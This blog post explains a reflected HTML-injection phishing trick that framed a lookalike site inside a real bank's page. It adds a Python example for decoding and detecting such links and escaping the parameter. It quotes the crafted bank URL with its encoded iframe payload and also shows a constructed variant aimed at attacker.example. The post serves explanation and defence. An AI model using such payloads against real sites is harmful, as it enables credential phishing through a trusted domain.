A new phishing exploit

I’ve run across a new phishing exploit–new to me, anyhow. This one is especially pernicious because it actually uses a legitimate bank’s website against itself.

Take a good look at the following URL:

http://www.charterone.com/ legalcenter/do_not_solicit_confirm.asp? name=%3Ciframe+ style%3D%22top%3A120%3B+ left%3A0%3B+ position%3Aabsolute%3B%22+ FRAMEBORDER%3D%220%22+ BORDER%3D%220%22+ width%3D900+ height%3D650+ src%3D%22http%3A%2F%2Fwww.totallyfreebanking.biz%22%

I’ve broken it up and highlighted the salient portions in red. I’ll break down what is happening here. Apparently, Charter One uses (or used–see below) a frame-based interface where the contents of a frame could be specified through the URL. What the scammer has done is set up a mimic site (www.totallyfreebanking.biz) that looks like Charter One’s, loads in a frame of Charter One’s page but isn’t part of it, and sends the phished data back to the scammer. So even a person who is generally aware of phishing scams might look at this URL and say “Oh, it really is from my bank, it has their URL, it must be OK.”
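The mechanism above is a URL parameter (the `name` value, which decodes to an `<iframe ...>` tag) being echoed unescaped into the bank's own page. The following Python is an added example, not code from the post or from the bank, showing how a defender can decode such a link the way the server sees it, flag parameters that carry markup, and contrast the vulnerable echo with an HTML-escaped one. The hostnames `bank.example` and `attacker.example` and the sample URLs are constructed for this example.

```python
"""Added example: decoding a crafted link, flagging reflected markup in a
query parameter, and escaping the value before it is echoed into HTML.
Hostnames and sample URLs below are constructed, not taken from the post."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample mirroring the post's pattern: the "name" parameter
# carries an <iframe> whose src points at an attacker-controlled mimic site.
CRAFTED_URL = (
    "http://bank.example/legalcenter/do_not_solicit_confirm.asp?"
    "name=%3Ciframe+style%3D%22position%3Aabsolute%3Btop%3A120%3Bleft%3A0%3B%22"
    "+frameborder%3D0+width%3D900+height%3D650"
    "+src%3D%22http%3A%2F%2Fattacker.example%22%3E%3C%2Fiframe%3E"
)
# Constructed benign link for comparison.
BENIGN_URL = "http://bank.example/legalcenter/do_not_solicit_confirm.asp?name=Jane+Doe"

# Matches the start of an HTML tag (opening or closing) anywhere in a value.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")


def decode_params(url):
    """Return the query parameters as the server decodes them
    ('+' becomes space, %XX sequences become characters)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def injected_markup(url):
    """Return the names of parameters whose decoded value contains an HTML tag.
    Useful for scanning web-server or proxy logs for links like the one in the post."""
    params = decode_params(url)
    return [key for key, values in params.items()
            if any(TAG_RE.search(value) for value in values)]


def render_unsafe(name):
    """The flaw the post describes: the parameter is echoed verbatim,
    so a value containing <iframe ...> becomes live markup in the bank's page."""
    return f"<p>Confirmation for {name}</p>"


def render_safe(name):
    """Hardened version: HTML-escape the value (including quotes) so that
    '<', '>', '&' and '\"' are shown as text and cannot open a tag or attribute."""
    return f"<p>Confirmation for {html.escape(name, quote=True)}</p>"


if __name__ == "__main__":
    for url in (CRAFTED_URL, BENIGN_URL):
        flagged = injected_markup(url)
        print(f"{url[:60]}... -> markup in params: {flagged or 'none'}")
    injected = decode_params(CRAFTED_URL)["name"][0]
    print("unsafe:", render_unsafe(injected))
    print("safe:  ", render_safe(injected))
```

`injected_markup` is a detection aid, not a sanitiser: the durable fix is `render_safe`'s output encoding at the point where the parameter is written into the page, because the server cannot enumerate every way a value might be made to look harmless. A site that also never needs to be displayed inside a frame from another origin can additionally refuse framing with the `X-Frame-Options` header or a Content Security Policy `frame-ancestors` directive, which addresses the framing half of the problem the post raises.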

I visited the page in question, and Charter One seems to have defeated this already.

I don’t want this to be a “frames are bad” rant, because I do think frames have their uses. And in fact, using URLs to specify frame contents goes a long way towards addressing the problem of frame-addressability. But anyone who can’t afford to have an outside party insert content into a frame needs something more subtle–perhaps a javascript detector in the framing page to prevent outside pages appearing in a frame.